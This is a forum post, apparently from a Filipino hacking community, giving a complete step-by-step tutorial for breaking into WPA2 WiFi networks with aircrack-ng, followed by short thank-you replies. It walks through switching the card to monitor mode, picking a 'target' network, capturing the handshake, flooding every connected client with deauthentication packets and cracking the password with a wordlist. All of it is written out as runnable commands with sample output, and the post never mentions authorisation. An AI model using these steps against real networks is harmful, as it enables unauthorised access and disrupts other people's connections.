👨‍🏫 Tutorial WiFi häçking | Deauthenticate and Capture the Handshake

[Aides]

Deauthenticate + Capture Handshake

Prequisites:

• Linux Machine | WSL
• Network Interface Card(NIC) supports Monitor Mode | Packet Injection

Check if your NIC supports monitor mode
In your terminal run the following commands:

iw list | grep -A8 "Supported interface modes"

You will see a response something like this.

Supported interface modes:
  * IBSS
  * managed
  * AP
  * AP/VLAN
  * monitor # We are looking for this
  * P2P-client
  * P2P-GO
  * P2P-device

If your network interface card(NIC) doesn't support it, you can buy an external WiFi adapter online.

Installing necessary packages
In your terminal run the following commands:

sudo apt update -y && sudo apt upgrade -y
sudo apt install aircrack-ng

Verify the downloaded packages:

aircrack-ng --help

Get your network interface card name.
In your terminal run the following commands:

iwconfig

You will see a response something like this:

lo          no wireless extensions.
wlp0s20f3   IEEE 802.11  ESSID:"ALHN-2E25"
            Mode:Managed  Frequency:5.805 GHz  Access Point: 90:75:BC:22:19:5D
            Bit Rate=130 Mb/s   Tx-Power=22 dBm
            Retry short limit:7   RTS thr:off   Fragment thr:off
            Power Management:on
            Link Quality=39/70  Signal level=-71 dBm
            Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
            Tx excessive retries:10  Invalid misc:1417   Missed beacon:0

As you can see the wlp0s20f3 is in Managed mode.

Kill interferring processes
In your terminal run the following commands:
Notes:
- Running this command will disconnect you from the internet

sudo airmon-ng check kill

Switch to monitor mode
In your terminal run the following commands:

sudo airmon-ng start `[network interface card name]`

Notes:
- Change the network interface name to your network interface. Mine is using wlp0s20f3, maybe yours is wlan0. This is why we get the network interface card name.
To verify if you successfully switched to monitor mode run the following commands:

iwconfig

You will see a response something like this:

lo            no wireless extensions.
wlp0s20f3mon  IEEE 802.11  ESSID:"ALHN-2E25"
              Mode:Monitor  Frequency:5.805 GHz  Access Point: 90:75:BC:22:19:5D
              Bit Rate=130 Mb/s   Tx-Power=22 dBm
              Retry short limit:7   RTS thr:off   Fragment thr:off
              Power Management:on
              Link Quality=39/70  Signal level=-71 dBm
              Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
              Tx excessive retries:10  Invalid misc:1417   Missed beacon:0

As you can see wlp0s20f3 is now wlp0s20f3mon, they did it like that to avoid any undefined behaviors if you will switch to managed mode later on.

Find your target
In your terminal run the following commands:

sudo airodump-ng `[network interface card name]`

You will see a response something like this:

[ CH 14 ][ Elapsed: 1 min ][ 2026-04-17 19:00 ]
 BSSID              PWR  Beacons      Data, /s  CH   MB   ENC CIPHER  AUTH ESSID
 A2:3E:8C:10:D8:56  -62        8       45    2   2  130   WPA2 CCMP   PSK  Kapalangga ❤️

I just display our target for this tutorial but in your case you will see more of this.
Notes:

• Store/write the BSSID, CH, ESSID of your target.
• The attack will only works on WPA2/WPE, so make sure that your target uses is too. You can verify it by reading encryption(ENC) column.

Capture the Handshake
There's a different way to capture the handshake but in this tutorial we will solely focus on aircrack-ng tools.
I would assume that you already done the recon part which is the section of "Find your target"
You should now have the following details of your target:

• BSSID
• ESSID
• CH

In your terminal run the following commands:

sudo airodump-ng [wlp0s20f3mon] --bssid "A2:3E:8C:10:D8:56" --essid "Kapalangga ❤️" --channel 1 --write "capture"

You will see a response something like this:

[ CH 1 ][ Elapsed: 1 min ][ 2026-04-17 19:00 ]
 BSSID              PWR  Beacons      Data, /s  CH   MB   ENC CIPHER  AUTH ESSID
 A2:3E:8C:10:D8:56  -62        8       45    2   2  130   WPA2 CCMP   PSK  Kapalangga ❤️

You might noticed that it's similar to finding your target section, because it is. We just tell our network interface to focus on this bssid, channel, and essid, and save the captured packets to "capture" prefix.
Do not exit this terminal, while do the deauthenticating. Unless we successfully capture the handshake, you will see something like this if we successfully captured it.

[ CH 1 ][ Elapsed: 1 min ][ 2026-04-17 19:00 ] [ WPA Handshake: "A2:3E:8C:10:D8:56" ]

Notes:

• Do not close this terminal
• Open a new terminal for the next steps

Deauthenticate Clients
We could deauthenticate all clients from the target network or target a single client, but in this tutorial we will deauthenticate all clients even though it's noisy it'll do the job.
In your terminal run this following commands:

sudo aireplay-ng -a "A2:3E:8C:10:D8:56" --deauth 0 "wlp0s20f3mon"

This will send deauthentication packets to all connected clients from the target network. Disconnecting all clients from the network, this will force a handshake that we needed. Clients will be force to reconnect, we are doing this because we don't wanna wait for new connected devices.

Waiting Game
Now we are deauthenticating clients and listening for incoming handshakes, we wait patiently. Wear your hood, and observe. The hood is mandatory.
Open the other terminal I said not to close, wait for something like this:

[ CH 1 ][ Elapsed: 1 min ][ 2026-04-17 19:00 ] [ WPA Handshake: "A2:3E:8C:10:D8:56" ]

If you capture the handshake, you can safely close it and stop the terminal that deauthenticating clients.
You can open your files or check if by running ls in the terminal.
You should see something like this:

• capture-01.cap
• capture-01.csv
• etc

We only need the capture-01.cap.

Crack the password
There's a lot of way to do it, and tutorial in youtube. In this tutorial we will use a dictionary attack, do not directly go for bruteforce it's time consuming and should be the last resort.
If you don't have any dictionary, you can download one and look for a tutorial in youtube. I would highly suggest using rockyou. You can even generate using AI. There's also a default dictionary downloaded along with aircrack-ng tools. We will use it in this tutorial.
Now that you have it, run the following commands in the terminal:

sudo aircrack-ng "capture-01.cap" -w "/usr/share/dict/wordlist-probable.txt"

If succeded, you will see something like this:

KEY FOUND: "password123"

Otherwise try another dictionary, or find a youtube tutorial using hashcat(bruteforcing).

Kung may tanong kayo, comment lang. Keep sharing everyone. <3

 

[jakehas11]

Thanks dito idol

 

[DARKCLOUDS]

nagana pa kaya ito sa naka WPA2?

 

[Dxysun]

Salamat po master keep sharing po

 

[Cyber Bricked]

thank you paps, keep sharing!

 

[skyrev]

Nice thanks Dito

 

[fahad6]

more shares pa boss salamat

 

[BBM Bangag]

utot pa crack ng cap file ko wala kc gpu pc ko

 

[BetaTester2021]

thanks for sharing ts !!
<3

 

[zakumeni]

Thank you bossing.

 

[Ying]

thank you po lods

 

[rhandel]

Support po! Keep on sharing! BM muna. Tnx

 

[ggggghhhhhhh]

salamat po master sa uulitin